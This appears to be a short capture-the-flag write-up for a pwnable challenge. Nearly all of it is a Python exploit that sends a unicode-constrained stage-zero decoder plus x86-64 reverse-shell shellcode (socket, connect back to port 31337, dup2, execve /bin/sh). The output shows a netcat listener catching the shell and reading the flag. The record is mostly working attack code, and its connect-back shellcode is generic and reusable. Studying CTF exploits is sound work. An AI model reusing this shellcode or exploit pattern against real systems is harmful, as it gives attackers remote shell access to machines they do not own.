Category : Pwnable (\xff\xe4\xcc)
Summary : unicode shellcode, overwrite below byte
Exploit
#!/usr/bin/python from socket import * from struct import pack import time HOST = "penser.shallweplayaga.me" PORT = 8273 """ 51 # push %rcx 00 45 00 # align 59 # pop %rcx 00 45 00 52 # push %rdx 00 45 00 58 # pop %rax 00 45 00 32 00 # xor (%rax), %al 50 # push %rax 00 45 00 5a # pop %rdx 00 45 00 59 # pop %rcx 00 45 00 59 # pop %rcx 00 45 00 59 # pop %rcx 00 45 00 59 # pop %rcx 00 0a # add %cl,(%rdx) 00 45 00 58 # pop %rax 00 45 00 50 # push %rax 00 45 00 58 # pop %rax 00 45 00 50 # push %rax 00 45 00 58 # pop %rax 00 45 00 50 # push %rax 00 45 00 58 # pop %rax 00 45 00 50 # push %rax 00 45 00 58 # pop %rax 00 45 00 50 # push %rax 00 4b 00 #### will be replaced """ stage0 = "\x51\x45\x59\x45\x52\x45\x58\x45\x32\x50\x45\x5a\x45\x59\x45\x59\x45\x59\x45\x59\x0a\x45\x58\x45\x50\x45\x58\x45\x50\x45\x58\x45\x50\x45\x58\x45\x50\x45\x58\x45\x50\x4b\x00\x00" shellcode = "\x90"*0x100 +\ "\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97" +\ "\x48\xb9\x02\x00\x7a\x69\x00\x00\x00\x00\x51\x48\x89\xe6" +\ "\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce" +\ "\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f" +\ "\x62\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48" +\ "\x89\xe6\x0f\x05" s = socket(AF_INET, SOCK_STREAM) s.connect((HOST, PORT)) s.send("\xc3\x02\x00\x00") time.sleep(0.5) s.send(stage0+shellcode) time.sleep(0.5) s.close() |
root@ubuntu:~# ./exploit.py -------------------------------------------------------------- root@ubuntu:~# nc -lv 31337 Connection from 54.226.204.186 port 31337 [tcp/*] accepted id uid=1001(penser) gid=1001(penser) groups=1001(penser) cat key The key is: TBDHelloooookdkdkiekdiekdiek |